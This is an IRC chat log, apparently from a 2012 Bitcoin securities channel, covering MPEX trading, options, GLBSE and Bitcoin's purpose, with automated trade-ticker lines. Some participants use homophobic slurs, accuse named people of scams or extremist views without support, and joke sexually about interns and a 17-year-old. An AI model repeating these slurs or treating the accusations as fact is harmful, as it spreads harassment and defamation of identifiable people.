certainly isn't making 7% to everyone... but it's gamble and many ppl are excited about that Oct 23 23:27:00 its a scam lol Oct 23 23:27:08 pyramid scheme!!!!! Oct 23 23:27:11 jk Oct 23 23:27:15 ofc Oct 23 23:28:13 help me make a btc billpay service Oct 23 23:28:34 you need web coder? Oct 23 23:29:16 oh yea and community ties Oct 23 23:30:15 ive built the trading bots and automated payment hooks/services Oct 23 23:30:28 just need a website and customers Oct 23 23:31:22 if you're able to pay upfront or based on milestone, then we have a deal. i can't afford to have another service that will maybe someday profit Oct 23 23:31:42 coinbr isnt gonna take off* Oct 23 23:33:02 ?* Oct 23 23:33:31 i'm positive it is, surely at least one GLBBQ passtrough operator will want to offload the process to us. but it's in the rut atm. Oct 23 23:34:03 then you set lol Oct 23 23:34:17 i need mint.com charts Oct 23 23:34:18 lol Oct 23 23:34:24 i will pay so much for thrm Oct 23 23:34:30 money is no real issue Oct 23 23:35:58 [MPEX] [S.MPOE] 30294 @ 0.00043669 = 13.2291 BTC [+] Oct 24 00:01:40 [MPEX] [S.MPOE] 10400 @ 0.00043735 = 4.5484 BTC [+] Oct 24 00:01:42 [MPEX] [S.MPOE] 26936 @ 0.00043738 = 11.7813 BTC [+] Oct 24 00:01:42 [MPEX] [S.MPOE] 7753 @ 0.00043767 = 3.3933 BTC [+] Oct 24 00:27:23 [MPEX] [S.MPOE] 6753 @ 0.00043669 = 2.949 BTC [-] Oct 24 00:27:25 [MPEX] [S.MPOE] 16419 @ 0.00043539 = 7.1487 BTC [-] Oct 24 00:28:34 Azelphur: you do billpayment? Oct 24 00:28:43 thestringpuller: yes Oct 24 00:28:59 lets combine our powers and become captain planet Oct 24 00:29:06 moo. Oct 24 00:29:19 http://btc411.com/2012/10/23/glbse-meeting-minutes-leaked/ anyone know who this guy is ? Oct 24 00:30:26 yea Oct 24 00:30:28 no Oct 24 00:31:02 lol k Oct 24 00:31:29 i camt read it Oct 24 00:31:37 omg worst web design evwr Oct 24 00:31:40 ever* Oct 24 00:34:07 kinda par for the course for blogs these days neh ? Oct 24 00:34:45 the thought "im too old for this shit" came to mind Oct 24 00:35:34 so anyway, re EskimoBob : btc is already delivering all the value it will or needs to deliver : it's not ddebase-able. Oct 24 00:35:54 it's not particularly intended to or useful as a trade currency. Oct 24 00:36:19 what is btc's intent? Oct 24 00:37:00 you buy five btc, right ? Oct 24 00:37:02 you go to bed Oct 24 00:37:05 you wake up in the morning Oct 24 00:37:08 you still have 5 btc. Oct 24 00:37:12 this is unique. Oct 24 00:37:30 you buy 5 usd, you go to bed, you wake up, you now have 4.99x usd. Oct 24 00:37:41 due to inflation? Oct 24 00:37:54 well, not due to inflation, due to money printing. Oct 24 00:38:08 .g currency debasement Oct 24 00:38:15 bah Oct 24 00:38:22 ;;google liekthis ? Oct 24 00:38:23 Urban Dictionary: liek: ; Liek this page to find out what SOSA really is | Facebook: ; Liek This in 3 Secs or Ur Gonna Get Raped or Somding | Facebook: ;;google currency debasement Oct 24 00:38:34 Debasement - Wikipedia, the free encyclopedia: ; CurrencyDebasement.com | Your comprehensive source for coin ...: ; From Currency Debasement To Social Collapse: 4 Case Studies ...: Oct 24 00:38:43 mk Oct 24 00:39:52 then what would be it's best use? Oct 24 00:40:17 ive found bitcoin-otc is a lot like morrocco Oct 24 00:40:21 it is Oct 24 00:40:30 but anyway, btc is the ideal currency of financial transactions. Oct 24 00:40:37 you know what dark pools are ? Oct 24 00:40:44 yessir Oct 24 00:40:51 well, that. Oct 24 00:41:06 like a global economic dark pool? Oct 24 00:41:14 btc is "off the books" Oct 24 00:41:17 like the currency of settlement for dark pools. Oct 24 00:41:44 consumers have no business in btc. consumers are in general dizzy cows that need their hand held, need reversible transactions, can't use computers etc. Oct 24 00:42:11 go on Oct 24 00:42:14 btc simply isn't either adequate or useful for the consumer. it's value propositions appeal to the financial sector pretty much exclusively. Oct 24 00:42:23 maybe high volume merchants, such as international trade Oct 24 00:42:36 seeing how fuckall wants to be bothered with letters of credit bs. Oct 24 00:42:55 so yeah, if you're buying containers or ships' worth from China paying in btc makes (a lot of) sense Oct 24 00:44:11 lol concered people, someone pmed me >> How do you make any money on http://smpake.com/? Oct 24 00:44:54 you had some fee didn't you ? Oct 24 00:45:03 its still there. Oct 24 00:45:11 2 or 20 satoshi Oct 24 00:45:13 ;> Oct 24 00:46:17 jurov did have a pretty good point, the "community" actively selects for scams, then hee-haws about "btc being full of scammers" Oct 24 00:46:23 should be beaten with wet sock. Oct 24 00:46:28 full of pennies Oct 24 00:49:33 when can we buy whitehouse interns mircea_popescu ? Oct 24 00:50:04 haha how should i know ? Oct 24 00:51:06 "[you] know things" Oct 24 00:52:27 [MPEX] [S.MPOE] 27381 @ 0.00043539 = 11.9214 BTC [-] Oct 24 00:52:27 well, some things. Oct 24 00:52:28 [MPEX] [S.MPOE] 15160 @ 0.00043429 = 6.5838 BTC [-] Oct 24 00:52:29 [MPEX] [S.MPOE] 12359 @ 0.00043408 = 5.3648 BTC [-] Oct 24 00:54:36 there should a bitcoin shadow government Oct 24 00:56:16 mircea, there's your veep: http://www.stevepavlina.com/blog/2012/10/10-reasons-you-should-vote-for-me-for-president/ Oct 24 00:59:14 Ironically, becoming President would mean that I’d finally have a job, but I’m willing to endure this short-term sacrifice for the greater good. Oct 24 01:00:10 here we are: 8. I won’t hide the fact that I’m shagging my interns. Oct 24 01:01:18 interns are hot. how can one resist? Oct 24 01:17:38 [MPEX] [S.MPOE] 19541 @ 0.00043408 = 8.4824 BTC [-] Oct 24 01:17:40 [MPEX] [S.MPOE] 12043 @ 0.00043388 = 5.2252 BTC [-] Oct 24 01:17:41 [MPEX] [S.MPOE] 5916 @ 0.00043379 = 2.5663 BTC [-] Oct 24 01:21:35 beep lol ?! Oct 24 01:22:05 i can't believe that guy's still at it. Oct 24 01:22:06 thestringpuller: it would be nice to have a codified law which one can freely agree to adhere to in the bitcoin game Oct 24 01:22:50 competing lexus would be nice to Oct 24 01:24:29 is it lexus, the plural of lex? Oct 24 01:24:44 ah Oct 24 01:24:47 leges Oct 24 01:25:35 so it would be nice to have multiple, competing leges in the bitcoin world Oct 24 01:33:46 >>How do you pay to run the website and server and domain? Oct 24 01:33:56 omg no, too funny. Oct 24 01:35:26 lol Oct 24 01:35:44 there's this large and growing contingent of idiots who honestly believe website = whole story. Oct 24 01:43:06 [MPEX] [S.MPOE] 10600 @ 0.00043475 = 4.6084 BTC [+] Oct 24 02:09:29 [MPEX] [S.MPOE] 31000 @ 0.000436 = 13.516 BTC [+] Oct 24 02:11:09 whole story? Oct 24 02:11:18 smickles: you love competition don't you? Oct 24 02:27:01 smickles : that big piece on gpg contracts i was saying i'm writing : http://trilema.com/2012/gpg-contracts/ Oct 24 02:27:35 mircea_popescu: what is your opinion of Stephen Colbert? Oct 24 02:27:43 don't think i have one. why ? Oct 24 02:28:12 We should put you on the colbert report to talk about bitcoin so it blows up. Oct 24 02:28:57 haha maybe. Oct 24 02:32:05 don't mean to be "that guy" mircea_popescu but you got typos in the post Oct 24 02:32:21 thestringpuller yup, it's being edited as we speak :) Oct 24 02:32:39 :) Oct 24 02:32:40 i tend to release things then have them typocheked etc and in general if you wait half hour you can see the definitive version Oct 24 02:32:47 but if you don't care you can read early. Oct 24 02:32:54 lol nefario double paid? Oct 24 02:33:00 so is claimed. Oct 24 02:33:28 moo Oct 24 02:35:43 this is pretty much what I wrote my most recent essay on for class Oct 24 02:35:53 it wasn't as eloquent tho ;) Oct 24 02:36:43 [MPEX] [S.MPOE] 38600 @ 0.00043667 = 16.8555 BTC [+] Oct 24 02:36:43 its great to see deadterra is close personal friends with yet another scammer Oct 24 02:36:43 [MPEX] [S.MPOE] 6400 @ 0.000436 = 2.7904 BTC [-] Oct 24 02:37:00 calling 'james', chatting and what not Oct 24 02:37:12 dub ikr. Oct 24 02:37:18 that guy has awesome friends Oct 24 02:37:32 who is that guy* Oct 24 02:37:33 lol Oct 24 02:37:52 the pronouns of those sentences confused me Oct 24 02:38:04 dude that has indirectly scammed a shitload of people by starting 'businesses' with scammers Oct 24 02:38:28 rg is giving you the run down via phone? Oct 24 02:39:42 oh and he's now running an arb bot Oct 24 02:40:15 i feel so out of the loop :( Oct 24 02:40:52 same, im catching up on teh securities forum for the first time in weeks Oct 24 02:41:20 dub allow me to quote Oct 24 02:41:45 running a scalping/arb bot is one of his primary 'partners', alberto's MO Oct 24 02:42:02 is this the bdt guy? Oct 24 02:42:18 yeah thats alberto Oct 24 02:43:39 Oct 04 19:02:26 DeaDTerra why do you insist in associating with well known scammers ? Oct 24 02:43:39 Oct 04 19:02:32 mircea_popescu: guruvan "part of the bitcoinica, bitcoin consultancy, bitcoinica consultancy crew that has stolen a large amount of customer funds. Do not trust these guys - bitcoinica, intersango, consultancy, or any new project" Oct 24 02:43:39 Oct 04 19:02:33 it's not a good business plan. Oct 24 02:43:39 Oct 04 19:02:39 I just talked to James, the situation is critical but stable for now. All the coins are safe in the offline wallet. It was not a hack. Oct 24 02:43:39 Oct 04 19:02:52 that, in re to genjix Oct 24 02:43:39 Oct 04 19:02:58 I am losing more respect for you each minute, so please shut up Mircea :) Oct 24 02:43:39 Oct 04 19:03:05 im surprised that he has the gall to even show up Oct 24 02:43:39 Oct 04 19:03:10 much less "vouch" for his scammer friends. Oct 24 02:43:39 Oct 04 19:03:18 DeaDTerra welcome to my ignore. Oct 24 02:43:39 Oct 04 19:03:24 DeaDTerra!*@* added to ignore list. Oct 24 02:46:26 as much as I hate people throwing up occams razor for every fucking scenario.. how many times do you have to enable a scam before you are the scammer Oct 24 02:47:12 only one time Oct 24 02:48:04 dub i still think he's just stupid. Oct 24 02:49:25 probably right. "Personally I don't think James is a crook" - because I have an excellent record of identifying crooks Oct 24 02:49:40 what's "personally" even mean anymore ? Oct 24 02:49:47 so rg is in trouble now? Oct 24 02:49:49 nefario goes about his personal union to glbse Oct 24 02:49:58 and people distinguish "personally" from what exactly ? officially ? Oct 24 02:50:07 why's rg in trouble ? Oct 24 02:50:31 19:52 < dub> probably right. "Personally I don't think James is a crook" - because I have an excellent record of identifying crooks Oct 24 02:50:38 that was a confusing sentence to me Oct 24 02:52:45 its a quote from DeadTerra Oct 24 02:53:20 ah Oct 24 02:59:05 umm Oct 24 02:59:06 I need a TL;DR consultant Oct 24 02:59:07 what about rg Oct 24 02:59:26 what the fuck Oct 24 02:59:28 to read the forums and provide digest of shit I have interest in Oct 24 03:00:10 why the fuck are you talking baout me Oct 24 03:00:12 rg: nv, just some huge ghost raping faggot Oct 24 03:00:22 and you're saying james Oct 24 03:00:23 im james Oct 24 03:00:31 you guys are fucked Oct 24 03:01:26 dub that's exactly what mpoe-pr does for me Oct 24 03:01:30 youshould hire a pr person/ Oct 24 03:01:31 someone give me the tl;dr on asic Oct 24 03:01:48 vaporware Oct 24 03:01:52 i got a couple of mails from bfl is there an eta yet? Oct 24 03:02:25 saw mention of some competitor with a unit due out in nov? Oct 24 03:02:42 not rly any deadline Oct 24 03:02:54 how come ? Oct 24 03:03:08 [MPEX] [S.MPOE] 8790 @ 0.00043652 = 3.837 BTC [+] Oct 24 03:03:09 I was telling the truth about gmaxwell's boyfriend Oct 24 03:05:16 someone was asking about bfl as an investment, i pointed out that they are bad at beign honest about delivery times, Luke-Jr advised them I was a troll and should be ignored.. Oct 24 03:05:57 I advised them that Luke-Jr thinks all non-catholics should be exterminated (which is true) so perhaps not the best giver of advice, gmax banned me Oct 24 03:06:01 ignore dub, he's a troll Oct 24 03:07:31 lol Oct 24 03:07:51 what exactly has gmaxwell idiot to do with minign now ? Oct 24 03:07:56 im not going to get into Luke-Jr opinion on sleeping arrangements with regard to his children Oct 24 03:08:08 that is too unsavoury to talk about tbh Oct 24 03:17:41 i want to know hwy people said m ynickname Oct 24 03:17:44 and were talking about me Oct 24 03:17:53 rg me too. Oct 24 03:17:56 i will ban you all in -otc Oct 24 03:17:59 if you dont tell me wihtin 2 minutes Oct 24 03:18:12 [20:18] »» [rg] #masshackers @+#bitcoin-otc +#trilema #litecoin #bitcoin-assets @#bitvps #bitcoin-hosting Oct 24 03:18:15 that's right bitch. Oct 24 03:18:43 uh oh Oct 24 03:18:45 ;> Oct 24 03:20:05 masshackers ? Oct 24 03:20:08 ahaha fag Oct 24 03:20:14 masshackers ? Oct 24 03:20:54 soh, wheres the ban Oct 24 03:21:20 I dunno about that rg guy tbh, I heard he was french Oct 24 03:23:26 taxes as "willing donations to the state treasury, and something people openly took pride in.", *swoon* Oct 24 03:23:47 mircea_popescu: massachusetts hackers Oct 24 03:23:52 (my state) Oct 24 03:23:58 its a local security group Oct 24 03:24:01 yaiknow... but... snort snort Oct 24 03:24:03 im giving a talk at their next meeting Oct 24 03:24:12 i think hte name is clever Oct 24 03:24:26 o you do Oct 24 03:24:31 smickles it's coming. Oct 24 03:24:38 ok dub told me what happened Oct 24 03:24:40 so i gave him +v Oct 24 03:24:43 instead of +b Oct 24 03:24:57 http://www.youtube.com/watch?v=rNWukYwv2Jk Oct 24 03:25:45 oh wow, I have weeks of -otc in buffer Oct 24 03:29:06 [MPEX] [S.MPOE] 29600 @ 0.00043688 = 12.9316 BTC [+] Oct 24 03:29:51 dub: I have full logs of everything xD Oct 24 03:30:21 yes, and while I may have trolled Luke a little, many assumed he was trolling for a long time. He also unbanned me several times after spamming rainbow ascii crucifix depicting jesus with an erection in his channel Oct 24 03:54:24 [MPEX] [S.MPOE] 7400 @ 0.00043688 = 3.2329 BTC [+] **** BEGIN LOGGING AT Wed Oct 24 09:03:00 2012 Oct 24 09:03:48 [MPEX] [S.MPOE] 9245 @ 0.00043551 = 4.0263 BTC [-] Oct 24 09:03:50 [MPEX] [S.MPOE] 15955 @ 0.00043403 = 6.9249 BTC [-] Oct 24 09:29:01 [MPEX] [S.MPOE] 10273 @ 0.00043801 = 4.4997 BTC [+] Oct 24 09:29:03 [MPEX] [S.MPOE] 19427 @ 0.00043867 = 8.522 BTC [+] Oct 24 09:54:02 [MPEX] [S.MPOE] 14445 @ 0.00043403 = 6.2696 BTC [-] Oct 24 09:54:04 [MPEX] [S.MPOE] 13184 @ 0.00043379 = 5.7191 BTC [-] Oct 24 09:54:05 [MPEX] [S.MPOE] 6332 @ 0.00043374 = 2.7464 BTC [-] Oct 24 10:19:20 [MPEX] [S.MPOE] 26368 @ 0.00043374 = 11.4369 BTC [-] Oct 24 10:19:22 [MPEX] [S.MPOE] 9506 @ 0.00043371 = 4.1228 BTC [-] Oct 24 10:44:26 [MPEX] [S.MPOE] 8794 @ 0.00043329 = 3.8104 BTC [-] Oct 24 10:44:28 [MPEX] [S.MPOE] 15106 @ 0.00043324 = 6.5445 BTC [-] Oct 24 11:09:32 [MPEX] [S.MPOE] 26 @ 0.00043363 = 0.0113 BTC [+] Oct 24 11:09:33 [MPEX] [S.MPOE] 13300 @ 0.00043532 = 5.7898 BTC [+] Oct 24 11:13:10 ~same boy you've always known, well i guess i haven't grown Oct 24 11:13:43 ~everyone who's in the know says, "that's exactly how it gows" **** BEGIN LOGGING AT Thu Oct 25 02:45:32 2012 Oct 25 02:46:44 "Putetumadre, what a great article. Insight untold and unparallelled here. Tip of my hat. Where is the Bitcoin donation button? How can I reprint this on my Web site? Please e-mail me with answers. Thanks :-)" Oct 25 02:46:55 blogging rocks. Oct 25 02:47:16 where is that from? Oct 25 02:48:03 my blog. Oct 25 02:48:25 ah Oct 25 02:48:30 I posted your blog to reddit: http://www.reddit.com/r/Bitcoin/comments/120zdj/gpg_contracts_vs_traditional_contracts_law/ Oct 25 02:48:39 just to see what redditors had to say Oct 25 02:48:56 http://i.imgur.com/t7W9K.gif - by far my favorite response Oct 25 02:52:17 redditors are not nearly as bright as you'd want though unfortunately Oct 25 02:52:29 reddit is beginning its eternal september :\ Oct 25 02:54:40 ahhh that was nice tho Oct 25 02:54:54 it's not that they're not that bright, it's that mostly they live on welfare. Oct 25 02:55:33 when you say welfare do you mean actual welfare? Oct 25 02:55:36 smickles http://www.reddit.com/r/Bitcoin/comments/120zdj/gpg_contracts_vs_traditional_contracts_law/ gib a vote man Oct 25 02:55:38 thestringpuller yes. Oct 25 02:56:00 do that many people actually depend on welfare? Oct 25 02:56:15 in some parts of the world over half the population Oct 25 02:56:19 Damn Oct 25 02:56:28 at that point why not just sell drugs? Oct 25 02:56:43 hahaha Oct 25 02:56:48 like fo realz Oct 25 02:56:50 why do you think the "war on drugs" isn't winnable Oct 25 02:57:02 i never thought the war on drugs was real Oct 25 02:57:05 let me dig you up a nice article from a while back Oct 25 02:57:12 due to the states involvement in making it profitable for cartels Oct 25 02:57:47 I always thought the war on drugs was a cover for incarcerating people for free labor. Oct 25 02:57:53 http://thelastpsychiatrist.com/2010/11/the_terrible_awful_truth_about_1.html Oct 25 02:59:52 http://coinbits.com/2012/10/24/gpg-contracts-vs-traditional-contracts-law/ what the hell is this thing supposed to be ?! Oct 25 03:00:26 Looks like a bot Oct 25 03:00:27 haha Oct 25 03:00:36 also that article had a reference to _Network_ Oct 25 03:00:41 which is an AWESOME movie Oct 25 03:01:15 :p Oct 25 03:01:21 pretty smart chick. Oct 25 03:01:57 the ironic thing about the movie network Oct 25 03:02:09 is when the guy went crazy on the air Oct 25 03:02:15 they just marketed it to people Oct 25 03:02:33 so the whole reason he went crazy was for moot almost Oct 25 03:03:15 [MPEX] [S.MPOE] 1300 @ 0.00043539 = 0.566 BTC [+] Oct 25 03:03:33 that's how the theory goes. Oct 25 03:04:04 So DL Hughley came on the Daily Show a few nights ago, and he was saying how he interviewed these gang members. And he said, "Why don't we hook you up with stock options of the prisons you'll be doing time in, when you do time" Oct 25 03:04:25 so he hooked up a bunch of gang members with legit stock options, which may become the standard for "hazard pay" Oct 25 03:05:41 how much does 1 incarceration really affect the value of the prison's stock though? Oct 25 03:05:59 seems like it would be pretty negligible Oct 25 03:06:09 iz i guess it's more like the principle of the thing, like invederate gamblers owning s.dice stock Oct 25 03:06:21 or people dealing in options owning mpoe stock. you get a discount Oct 25 03:06:26 yeah, it's a cool idea, but not terribly practical Oct 25 03:06:33 if you're incarcerated chances are you'll be doing labor for free Oct 25 03:06:37 iz: you ever hang out on Undernet? Oct 25 03:06:41 you could probably make more money by finding change in your car Oct 25 03:06:57 rg: i did for a bit, but under a different nick Oct 25 03:07:01 iz people who go to prison aren't really the best at making money. Oct 25 03:07:03 daz? Oct 25 03:07:06 if they were they wouldn't be there. Oct 25 03:07:10 #malice ? Oct 25 03:07:23 nope, different person probably Oct 25 03:07:26 some people who go to prison though are patsies and get paid comfortably Oct 25 03:07:27 yeah Oct 25 03:07:31 i doubt ill ever find daz again Oct 25 03:07:38 thestringpuller a bunch ya Oct 25 03:08:30 trying to find the quote from dl hughley Oct 25 03:09:46 okay so I think it's more the gang buys stock in the companies that own the prison's they'll be serving time in Oct 25 03:09:58 and put that as part of the hazard pay Oct 25 03:10:00 ah, that makes more sense Oct 25 03:10:02 I'll have to look into it Oct 25 03:10:40 my point is their are better ways to "game the system" Oct 25 03:10:45 there* Oct 25 03:11:34 mircea_popescu: I was thinking about what yo said a few days ago. BTC is not for the average consumer. What if someone did a BTC -> Stock Exchange pass thru? Oct 25 03:11:53 you mean stock exchange as in , nyse ? Oct 25 03:12:02 yessir Oct 25 03:12:10 what is the benefit ? Oct 25 03:12:27 expose btc to wider markets Oct 25 03:12:34 how does it expose btc to anything ? Oct 25 03:12:40 people buying stocks still buy them in usd Oct 25 03:13:07 that makes btc a "closed system" then Oct 25 03:13:13 no, not really. Oct 25 03:13:25 the thing to do is getting future contracts with physical delivery IN BTC. Oct 25 03:13:32 something i've been working on for what, six months now. Oct 25 03:13:36 once that happens we're golden. Oct 25 03:13:40 physical delivery? Oct 25 03:13:42 yes. Oct 25 03:13:49 as in like FedEx? Oct 25 03:13:57 no lol. as in cushing, ok Oct 25 03:14:27 care to elaborate a little? Oct 25 03:14:33 you know what future contracts are ? Oct 25 03:15:00 of futures exchange Oct 25 03:15:05 I totally misread that sentence Oct 25 03:15:08 I'm a dumbass Oct 25 03:15:12 sorry :( Oct 25 03:15:18 oh* Oct 25 03:15:21 lol np Oct 25 03:17:34 so you're implementing a futures option for mpex? neat :) Oct 25 03:17:45 future contracts* Oct 25 03:20:12 trying to. Oct 25 03:20:22 You have a lot of financial knowledge for a programmer Oct 25 03:20:25 very rare Oct 25 03:20:30 who told you i was a programmer ?! Oct 25 03:20:39 Are you a programmer? Oct 25 03:20:41 nope. Oct 25 03:20:44 okay nvm Oct 25 03:20:45 hahaha Oct 25 03:20:48 lol Oct 25 03:20:56 im on the internet so therefore im a programmer :D Oct 25 03:21:02 exactly! Oct 25 03:21:04 :) Oct 25 03:26:06 MPOE has been weird today Oct 25 03:27:19 Why does no one want satoshi dice? Oct 25 03:29:04 [MPEX] [S.MPOE] 49196 @ 0.00043439 = 21.3703 BTC [-] Oct 25 03:29:59 !ticker s.dice Oct 25 03:30:00 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0001 / 0.00298639 / 0.0034 (2013520 shares, 6,013.16 BTC) Oct 25 03:30:15 stagnant like a mosquito pond Oct 25 03:30:15 70-80k a month isn't really much is it. Oct 25 03:30:26 !ticker s.mpoe Oct 25 03:30:28 [MPEX:S.MPOE] 1day: 0.00043264 / 0.00043505 / 0.00043867 (1298344 shares, 564.86 BTC), 30day: 0.00025015 / 0.00037181 / 0.00046059 (86641622 shares, 32,214.45 BTC) Oct 25 03:30:46 heh yea Oct 25 03:30:55 !ticker s.bvps Oct 25 03:30:56 [MPEX:S.BVPS] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0027501 / 0.00345047 / 0.00355 (63482 shares, 219.04 BTC) Oct 25 03:31:03 heh Oct 25 03:31:04 lol Oct 25 03:31:36 I must say, I've learned more about finance from the BTC community than anywhere else. Oct 25 03:31:41 i like how the price graph tells the story of the sec panic Oct 25 03:31:56 the exchanges listed in the topic, why will they not encounter the same legal problems glbse ran into? Oct 25 03:31:59 thestringpuller i always said, btc is a very cheap way to gain a good financial education Oct 25 03:32:15 gp5st how do you know glbbq ran into legal problems ? Oct 25 03:32:37 mircea_popescu: i guess i just assumed they did. Oct 25 03:33:04 seems to be the common answer whenever asked about it Oct 25 03:33:04 pirate had "some friends that decided to make things difficult" Oct 25 03:33:14 what guarantees you don't have some friends that will make things difficult ? Oct 25 03:33:35 mircea_popescu: since that's a vauge statement i can't give anything but a vauge answer Oct 25 03:33:40 right. Oct 25 03:33:49 the "legal troubles" is no better and no different. Oct 25 03:34:43 well, moving on to more tangible topics: of the exchanges listed in the topic, which has the most volume (I'm currently looking into them, so I'm still learning) Oct 25 03:35:06 bit4x Oct 25 03:35:09 lol Oct 25 03:35:09 pwn. Oct 25 03:35:26 gp5st mpex is doing ~60k atm. it was always doing about 3x to 5x glbse volume Oct 25 03:35:48 ok Oct 25 03:35:55 actually towards the end it was prolly more like 10x, but heck. Oct 25 03:37:40 mpex isn't very diverse though Oct 25 03:37:47 in terms of stocks Oct 25 03:37:49 :P Oct 25 03:38:07 but then again that's not mpex's fault, there aren't a lot of btc-based companies worth listing Oct 25 03:38:32 i was gonna say, you know i could make it VERY diverse in about half hour Oct 25 03:38:38 lol Oct 25 03:38:45 and then gp5st's question would suddenly gain lots of flesh Oct 25 03:39:52 would you list bitinstant? Oct 25 03:40:01 if they were allowed to be listed on MPEX Oct 25 03:40:07 (based on their lawyers discretion) Oct 25 03:40:52 what are the 3 companies with stock listed? Oct 25 03:41:19 S.MPOE | S.BVPS | S.DICE Oct 25 03:41:42 yes, i see those:) what/who are they though Oct 25 03:41:52 nvm Oct 25 03:41:58 there is a details link i missed before Oct 25 03:43:11 gp5st s.mpoe is the conglomerate of mpoe (the options broker) and mpex (the stock exchange). the historical contract is found here : Oct 25 03:43:24 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Oct 25 03:43:36 s.dice is satoshi dice. s.bvps is bitvps, rg's hosting company Oct 25 03:44:15 thestringpuller in principle yes, but a lot depends on what contract can be agreed upon. Oct 25 03:44:51 I'm just wondering more of, if a BTC based company becomes profitable and takes VC money, does that mean it's bound by regulation now?? Oct 25 03:45:03 Or can it still exist in the "gray-sphere" Oct 25 03:45:23 i guess that'd also depend on the contract they entered into with the vcs Oct 25 03:45:34 there's no "gray sphere" Oct 25 03:45:50 there's a tiny fraction of the world called the united states, and a much larger, comparatively more important rest. Oct 25 03:46:05 LOL Oct 25 03:46:15 Does everyone hate Murica? Oct 25 03:46:21 why hate ? Oct 25 03:46:27 this is like new yorkers thinking the us=new york. Oct 25 03:46:38 LOL Oct 25 03:46:39 there's 10 mn people living in new york and 290 mn people NOT living in new york. Oct 25 03:47:07 just so there's 300mn people living in the us and 6,8 bn people NOT living in the us Oct 25 03:47:11 New York is a good manifestation of American capitalism... Oct 25 03:47:27 these days it's mostly a sad manifestation of american welfarism, but anyway. Oct 25 03:47:42 lol everybody on welfare! Oct 25 03:47:57 except jon steward Oct 25 03:48:03 you can't tell me that something is a manifestation of capitalism when that something is traditionally blue Oct 25 03:49:41 there are a lot of welfare recipients... Oct 25 03:50:13 starving "artists" + university "students" => socialist environment. Oct 25 03:51:09 *facepalm* I laugh inside because the stereotype is true. Oct 25 03:51:18 myeah. Oct 25 03:51:40 There is a section of Atlanta just like that. Full of new age retro hippies. Oct 25 03:51:55 kinda fun to hang out with, Oct 25 03:51:59 but kinda difficult to take seriously. Oct 25 03:52:00 "wanna by my art maaaan?" no get a job hippie Oct 25 03:53:16 The coinbase funding is dumb. Coinbase is not even that good, it's all hype. Blockchain.info has so many more features... Oct 25 03:53:34 (random topic) Oct 25 03:54:15 uhhk? Oct 25 03:54:27 [MPEX] [S.MPOE] 7772 @ 0.00043539 = 3.3839 BTC [+] Oct 25 03:54:52 they got a bunch of funding from ycombinator Oct 25 03:55:38 almost 1M and it's pretty much blockchain's wallet with "prospective features" Oct 25 03:55:39 im not even sure what coinbase is, so i guesshey may have a point lol Oct 25 03:55:58 blockchain.info* Oct 25 03:56:47 i'm sorry if i'm being a pain: how do the options work on mpex? Oct 25 03:57:39 gp5st you're not a pain, kinda what this chan is for. do you know options in general ? Oct 25 03:58:21 a little bit. i buy an option @ a price and then when it expires i need to buy the underlying thing at the price i bought the option at? Oct 25 03:58:32 that's a future. Oct 25 03:58:44 ah, then i guess i do not Oct 25 03:58:46 options convey the right but not the obligation to either buy (calls) or sell (puts) at the strike price Oct 25 03:59:11 mpex options are american-style, so that option is there all through till expiration (unlike european style, where option only exists at expiration) Oct 25 03:59:42 what's the premium on the options Oct 25 04:00:02 well what the bot asks, neh ? Oct 25 04:00:29 ic Oct 25 04:00:30 Haha Oct 25 04:01:24 gp5st anyway, a good idea is to read up on options in general, mpex is pretty much the same. Oct 25 04:01:32 so if i buy one $1/btc option, what happens on fri? i can sell or buy what with it? Oct 25 04:01:59 yeah, i'm in the process of trying to learn about how financial markets work Oct 25 04:02:03 option, call or put ? Oct 25 04:02:05 there is a lot there to learn Oct 25 04:02:23 there is a lot to learn. as i was saying, bitcoin is a very cheap way to learn finance, comparatively. so, good for you. Oct 25 04:02:52 bitcoin is to finance what computer fly simulators are to pilots i'd say. Oct 25 04:04:32 mircea_popescu so btc can be used to train people to be good traders? Oct 25 04:05:26 sure. Oct 25 04:05:55 if i ran an investment bank/hedge fund what i'd do is give all interns 1k btc, hire the top x ones by final btc Oct 25 04:06:11 that's how I found my interns Oct 25 04:06:15 gave them all 1 btc Oct 25 04:06:22 whoever brings back 2 btc gets a job Oct 25 04:06:26 haha yeah Oct 25 04:07:03 ironically the only person who succeeded was a 17 year old girl who is a physics/econ major... Oct 25 04:07:45 hire her. Oct 25 04:08:16 already did. hopefully she can help grow my startup Oct 25 04:08:29 or at least the btc sector Oct 25 04:08:45 17 yo girls with physics/econ can make anything grow. Oct 25 04:08:49 XD Oct 25 04:08:59 that's what she said! Oct 25 04:09:17 "And saying that economics is the central component of western cultural identity and that indigenous people's downfall is because they simply implemented it the wrong way is beyond retarded." Oct 25 04:09:35 lolz. teh reddit socialists at the rescue! Oct 25 04:10:03 reddit is eternal september mang Oct 25 04:10:14 kinda sucks Oct 25 04:11:08 this promises to be fun. Oct 25 04:11:10 what are the legal ramifications for listing on mpex? would a us-based company be able to put shares on it? Oct 25 04:11:30 gp5st i'm really not qualified to discuss that. us-based company should make its own determination. Oct 25 04:12:03 however, if that company isn't principally taking a btc revenue it makes little sense to list on mpex Oct 25 04:12:06 i was just curious what the limitations dice and bvps had Oct 25 04:12:15 i shouldn't have made it so us-centric Oct 25 04:12:20 (for purely accounting reasons, shares in btc, revenues in non-btc, makes a mess) Oct 25 04:12:45 do they tax BTC income yet? Oct 25 04:12:58 like everything else, once you realise a profit. Oct 25 04:13:31 if your revenue stream was comprised of 100% BTC, would you claim it? Oct 25 04:13:32 but only a profit from in a recognized currency, like usd or eur, right? Oct 25 04:13:37 or just be like "uh it's play money" Oct 25 04:13:49 I know it depends on the country Oct 25 04:13:52 gp5st if you sell btc and now have extra eur or w/e you'd declare it like any other revenue Oct 25 04:14:09 seems like the best place to make a btc business is romania... Oct 25 04:14:13 as long as you keep it as btc afaik in most jurisdictions there's no declaration Oct 25 04:14:21 yes, but if i buy a stock with btc, and sell it for more btc... Oct 25 04:14:26 thestringpuller: how come? Oct 25 04:14:32 gotchya mircea_popescu Oct 25 04:20:16 smickles said the romanian lawyers see BTC as play money Oct 25 04:20:16 take care Oct 25 04:20:36 [MPEX] [S.MPOE] 3875 @ 0.00043439 = 1.6833 BTC [-] Oct 25 04:20:37 [MPEX] [S.MPOE] 33625 @ 0.0004338 = 14.5865 BTC [-] Oct 25 04:20:40 the war on drugs is not winnable because nobody is trying to win it, like the war on terror Oct 25 